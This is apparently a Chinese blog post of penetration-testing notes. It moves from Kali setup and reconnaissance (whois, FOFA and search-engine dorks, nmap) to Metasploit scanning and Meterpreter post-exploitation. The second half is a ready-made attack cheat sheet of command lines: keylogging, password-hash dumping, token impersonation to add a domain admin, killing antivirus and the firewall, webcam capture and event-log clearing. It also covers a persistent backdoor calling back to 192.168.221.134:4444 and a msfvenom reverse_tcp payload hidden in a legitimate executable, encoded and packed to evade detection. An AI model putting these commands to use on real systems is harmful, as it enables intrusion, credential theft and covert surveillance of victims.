渗透测试

发布于 2022-02-08  2844 次阅读

apt命令包含了apt-get命令的功能

apt full-upgrade更新系统

kali锁屏的关闭

右上角.设置.电源管理器.安全性.自动锁定会话改成从不并且把下面的勾取消即可.

ssh登录

1.systemctl enable sshd
2.systemctl start sshd
3.vim /etc/ssh/sshd_config     esc :set nu显示行号
4.38行去掉#后面没有yes就添加yes即可,PermitRootLogin yes
5.systemctl restart sshd
6.update-rc.d ssh enable开机自启

kali与windows文件传输

1.apt install lrzsz
2.rz  windows向kali传文件
3.sz  kali向windows传文件

信息收集

ping 12306.cn   返回ip
nslookup 12306.cn  返回dns服务器,域名别名,ip,获得服务器附加信息
dig <@域名服务器> [域名] <any 显示更加详细>
dig -x ip   将ip解析为域名
https://whois.aliyun.com
站长之家
whois testfire.net
Netcraft,网页界面工具,使用它我们能发现承载某个特定网站的服务器ip
tracert www.baidu.com  路由跟踪三层设备

子域名收集

1.搜索引擎挖掘:google中输入site:qq.com
2.第三方网站查询: http://tool.chinaz.com/subdomain、https://dnsdumpster.com
3.证书透明度公开日志枚举:https://crt.sh/
4.其他途径:https://phpinfo.me/domain
5.工具爆破layer(支持批量导入导出)

搜索引擎的使用

FOFA是一款非常强大的搜索引擎,FOFA(网络空间资产检索系统)是世界上数据覆盖更完整的IT设备搜索引擎,拥有全球联网IT设备更全的DNA 信息。探索全球互联网的资产信息,进行资产及漏洞影响范围分析、应用分布统计、应用流行度态势感知等。相对于shodan来说FOFA的优点就是更加本土化,拥有更多的域名数据,建立了全球最大的资产规则集,而且现在已经更新了识别蜜罐的功能。
可以通过ip/body/title/某个图标……来
title="beijing"  从标题中搜索"北京"
country="CN"  国家为中国
&&多个限制条件连接符
body=“” 可以通过页面中包含的特定字符串来搜索资产
domaain="xueshen.cn"搜索域名中包含xuegod.cn的资产
region="Xinjiang"   搜索指定行政区的资产
city=“beijing”   搜索指定城市的资产
city!="beijing" 搜素除beijing外的城市
||或
js_name="route.js" js文件包含route.js的网站
app="HP-打印机"

百度搜索引擎语法

filetype:xls  将返回所有以xls结尾的excel文件的URL地址(介绍:通过搜索引擎,获取指定类型的文件。)
info:www.csdn.net 获取csdn的相关信息(介绍:搜索指定网站的一些基本信息。)
inurl:admin 搜索出大量网站后台的管理员登录地址。(介绍:搜索在url链接中包含某个关键字,这个就比较厉害了。)
index of /admin 获取一些网站的后台登录地址(介绍:对搜索引擎结果进行二次检索。)
intext:LexSaints 在全网搜索博主自己(介绍:搜索网页正文内容,和我们常规搜索相似)
intitle:lexsaints 全网title包含LexSaints的网站 (搜索网页的标题内容)
cache:lexsaints (介绍:搜索引擎关于某项关键字的缓存信息,emmm有可能会发现一些很有趣的东西)
define:lexsaints 全网对博主LexSaints的定义(介绍:全网对某个关键词的定义)
link:www.swjtu.edu.cn 我母校的主网址,会把相关的一些网址都搜出来(介绍:搜索与某个网址有关联的其他网址)
site:www.swjtu.edu.cn(介绍:获取某个主网站下的相关网站)       site:"testfire admin"
links:lexsaints 搜索博主相关的网站链接(搜索博主相关的网站链接)
alliurl:www.baidu.com 所有与百度相关的链接地址:百度地图、推广全部找到了(介绍:获取与网站相关的所有url链接地址)
摘自

ARL资产侦察灯塔系统搭建及使用

ARL(Asset Reconnaissance Lighthouse)资产侦查灯塔旨在快速发现并整理企业外网资产并为资产构建基础数据库,无需登录凭证或特殊访问即可主动发现并识别资产,让甲方安全团队或者渗透测试人员快速寻找到指定企业资产中的脆弱点,降低资产被威胁利用的可能性并规避可能带来的不利影响
搭建
yum install docker
yum -y install epel-release
setenforce 0
systemctl start docker && systemctl enable docker
docker pull tophant/arl
yum install -y docker-compose
git clone https://github.com/TophantTechnology/ARL
unzip ARL-master.zip
getenforce
setenforce 0
vim /etc/selinux/config  将 enforcing 或 permissive 改成 disabled
docker volume create --name=arl_db
docker-compose up -d
访问https://ip:5003即可,密码(admin:arlpass)

nmap的使用

nmap [-sS  执行一次隐秘的tcp扫描]                 <ip>
[-Pn 默认所有目标主机存活]
[-A   尝试深入服务枚举和旗标获取,获得更多目标细节]
[-f     碎片化扫描]
[--mtu 8    偏移量必须是 8 的倍数]
[ -D RND:10   设置10个虚假ip]
[--script all      脚本安装在share/nmap/scripts]
[-oX      生成xml报告文件]

Metasploit连接PostgreSQL数据库

  1. /etc/init.d/postgresql start
  2. db_connect postgres:123456@127.0.0.1/msf  数据库需要初始化操作(第一步CREATE DATABASE msf)
  3. msf > db_status   来确认数据连接是否成功
    1. nmap输出结果导入Metasploit
      1. nmap -Pn -sS -A  -oX nmap.xml  192.168.1.0/24      生成一份xml文件
      2. db_import ./nmap.xml     导入数据库
      3. hosts -c address    验证是否成功导入
    2. Metasploit与nmap交互
      1. TCP空闲扫描(空闲主机(该主机一段时间内不向网络发送数据包)扫描)
        1. use auxiliary/scanner/ip/ipidseq
          set rhosts 172.17.120.1/24     设置目标
          set threads 128        设置线程数linux最大128,windows最大16
          run
          扫描结果为Incremental是空闲主机
        2. nmap -Pn -sI 172.20.154.85 172.17.120.1   利用僵尸主机172.20.154.85进行测试172.17.120.1
      2. msf中使用nmap扫描
        1. db_connect postgres:123456@127.0.0.1/msf
        2. db_nmap -sS -A 172.17.120.1/24
        3. services -u 查看数据库里的结果
    3. 使用msf进行端口扫描
        1. search portscan
          use auxiliary/scanner/portscan/syn
          show options
          set threads 50
          set rhosts 172.20.154.32
          run
    4. smb扫描
      use auxiliary/scanner/smb/smb_version
      set rhosts 172.17.120.1/24
      set threads 128
      run
      host -u -c address,os_name,svcs,vulns,workspace
    5. MSSQL服务探测
        1. use auxiliary/scanner/mssql/mssql_ping
        2. show options
        3. set threads 128
        4. set rhosts 172.17.120.1/24
        5. run
    6. ssh服务版本扫描
        1. use auxiliary/scanner/ssh/ssh_version
          show options
          set rhosts 172.17.120.1/24
          set threads 255
          run
    7. ftp扫描(查看服务器是否允许用户匿名登录)
        1. use auxiliary/scanner/ftp/anonymous
        2. set rhosts 172.17.120.1/24
        3. set threads 128
        4. run
    8. 验证SMB登录
      1. use auxiliary/scanner/smb/smb_login
        set threads 128
        set rhosts 172.17.120.1/24
        set verbose false
        set smbuser administrator
        set smbpass 123456
        run
    9. 扫描开放的VNC空口令
      1. use auxiliary/scanner/vnc/vnc_none_auth
        set rhosts 172.17.120.1/24
        set threads 128
        run

Meterpreter基本命令

  • screenshot截屏
  • execute -f calc.exe   运行计算器
  • sysinfo查看系统简单的信息
  • shell  之后乱码chcp 65001
  •  键盘记录
    1. ps
      migrate 9932   将进程迁移到非system进程pid中
      run post/windows/capture/keylog_recorder
      ctal+c终止
      cat   /root/.msf4/loot/20220227054943_default_192.168.221.1_host.windows.key_343787.txtcat 即可
  • 获取用户哈希值
    1. 将进程注入的system里
      use priv
      run post/windows/gather/hashdump
  • windows提权
    • use priv
      getsystem
      getuid
  • 令牌假冒
    • ps
      steal_token 656
    • use incognito
      list_tokens -u
      impersonate_token az302\\Administrator    使用az302域administrator的令牌
      add_user abc 123456 -h 域控ip            在域控主机添加用户
      add_group_user "Domain Admins" abc -h 域控ip     将创建的用户加入管理员组
  • 使用Meterpreter进行跳板攻击
    1. run get_local_subnets                   查看本地子网
      route add 172.17.120.0 255.255.255.0 1    将session1上建立一个路由
    2. load auto_add_route
      run 端口扫描
  • 使用Meterpreter脚本
      • run vnc
      • /usr/share/metasploit-framework/scripts/meterpreter/vnc.rb添加pay.datastore['ViewOnly'] = false即可
      • if (not courtesy)
        pay.datastore['DisableCourtesyShell'] = true
        pay.datastore['ViewOnly'] = false
        end
    • 进程迁移
      • run post/windows/manage/migrate
    • 关闭杀软
      • run killav
    • 摄像头抓拍
      • webcam_list 列出摄像头编号
      • webcam_snap   拍一张照片
        • -h:显示帮助。-i :要使用的网络摄像头的索引号。-p :JPEG图像文件路径。默认为HOME / [随机乱码名字] .jpeg-q :JPEG图像质量,默认为“50”。-v :自动查看JPEG图像,默认为“true”。
      • run webcam   持续抓拍
        • h:显示帮助横幅。-d :循环延迟间隔(以毫秒为单位),默认为1000。-f:只抓一帧。-g:发送到GUI而不是写入文件。-i :默认情况下使用的网络摄像头的索引1。

          -l:默认情况下保持循环捕获(无用)。

          -p :默认情况下,文件夹映像的路径将保存在当前工作目录中。

          -q :JPEG质量,默认为“50”。

    • 获取系统哈希值
      • run hashdump
    • 查看目标机器上的所有流量
      • run packetrecorder -i SessionId
    • 获取系统信息(用户密码、注册表、系统信息……)
      • run scraper
    • 木马持久化
      •  run persistence -X -i 50 -p 4444 -r 192.168.221.134
        -X 马开机自启
        -i 每隔多少秒连接一次
        -p 连接的端口
        -r  连接的ip
      • 删除方法
        • 计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run和C:\WINDOWS\TEMP下的VBScript文件
    • shell升级为Meterpreter
      • sessions -u SessionId
    • Railgun组件操作Windows API
  • 关闭防火墙
    • run getcountermeasure -d -k
    • netsh advfirewall set allprofiles state offs
  • 识别靶机是否是虚拟机
    • checkvm
  • uictl [enable/disable] [keyboard/mouse/all] # 开启或禁止键盘/鼠标
    uictl disable mouse # 禁用鼠标
    uictl disable keyboard # 禁用键盘
  • clearev清除日志
  • 更多操作

MSF免杀

  • msfvenom -l encoders 查看编码器
  • msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.221.134 lpost=4444 -e x86/shikata_ga_nai -i 10 -f exe -x /root/Desktop/geek.exe -k -o 1.exe
    • -p payload
    • -e 指定混淆编码器
    • -i 混淆几次
    • -f 文件格式
    • -x 捆绑、
    • -k 捆绑保留原文件功能
    • -o 输出位置
    • -b \0f  避免出现这个字符
    • -platfrom 指定系统
  • 加壳
    • upx -9 /root/Desktop/123.exe

fast-track

  • 自动化渗透

Karmetasploit

  • 无线攻击套件
子夜不哭
最后更新于 2022-02-08
啥也没有呀